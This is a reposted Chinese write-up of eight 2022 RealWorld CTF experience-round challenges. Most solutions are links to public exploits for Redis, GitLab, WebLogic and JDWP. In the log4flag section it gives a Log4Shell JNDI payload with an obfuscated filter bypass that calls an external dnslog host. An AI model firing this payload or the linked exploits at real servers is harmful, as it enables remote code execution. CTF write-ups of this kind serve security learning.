2022 RealWorld CTF体验赛Writeup

admin
admin
admin
138691
文章
114
评论
2022年1月26日10:48:05评论456 views字数 1033阅读3分26秒阅读模式

本文来自“白帽子社区知识星球”

作者:末初

2022 RealWorld CTF体验赛Writeup


白帽子社区知识星球

加入星球,共同进步
01

Digital Souvenir

2022 RealWorld CTF体验赛Writeup2022 RealWorld CTF体验赛Writeup

rwctf{RealWorldIsAwesome}
02

log4flag


2022 RealWorld CTF体验赛Writeup有一些正则过滤2022 RealWorld CTF体验赛Writeup网上bypass方法很多,随便找一个就行

${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}

2022 RealWorld CTF体验赛WriteupRefer:https://cloud.tencent.com/developer/article/19215302022 RealWorld CTF体验赛Writeup2022 RealWorld CTF体验赛Writeup

03

Be-a-Database-Hacker



2022 RealWorld CTF体验赛Writeupredis未授权访问2022 RealWorld CTF体验赛WriteupRefer: https://github.com/n0b0dyCN/redis-rogue-server

2022 RealWorld CTF体验赛Writeup2022 RealWorld CTF体验赛Writeup

04

the Secrets of Memory


2022 RealWorld CTF体验赛Writeup2022 RealWorld CTF体验赛WriteupRefer:https://landgrey.me/blog/16/

2022 RealWorld CTF体验赛Writeup
05

baby flaglab


2022 RealWorld CTF体验赛WriteupRefer:https://github.com/Al1ex/CVE-2021-222052022 RealWorld CTF体验赛Writeup

2022 RealWorld CTF体验赛Writeup
06

Flag Console


2022 RealWorld CTF体验赛Writeup2022 RealWorld CTF体验赛Writeup

Refer:https://github.com/backlion/CVE-2020-14882_ALL

2022 RealWorld CTF体验赛Writeup
07

Be-a-Database-Hacker 2


2022 RealWorld CTF体验赛WriteupRefer:https://blog.csdn.net/qq_36869808/article/details/122426922

2022 RealWorld CTF体验赛Writeup2022 RealWorld CTF体验赛Writeup

08

Java Remote Debugger


2022 RealWorld CTF体验赛WriteupTest.java

import java.lang.Thread;
publicclass Test {
  public static void main (String[] args) throws Exception{
    int i = 0;
    while (1 == 1) {
      Thread.sleep(1000);
      System.out.println("" + i);
      i += 1;
    }
  }
}

Java Debug Wire Protocol (JDWP) - Remote Code Execution

Refer:https://security.tencent.com/index.php/blog/msg/137

2022 RealWorld CTF体验赛Writeup

2022 RealWorld CTF体验赛Writeup

如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼


2022 RealWorld CTF体验赛Writeup
2022 RealWorld CTF体验赛Writeup

原文始发于微信公众号(白帽子社区):2022 RealWorld CTF体验赛Writeup

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月26日10:48:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2022 RealWorld CTF体验赛Writeuphttps://cn-sec.com/archives/754642.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息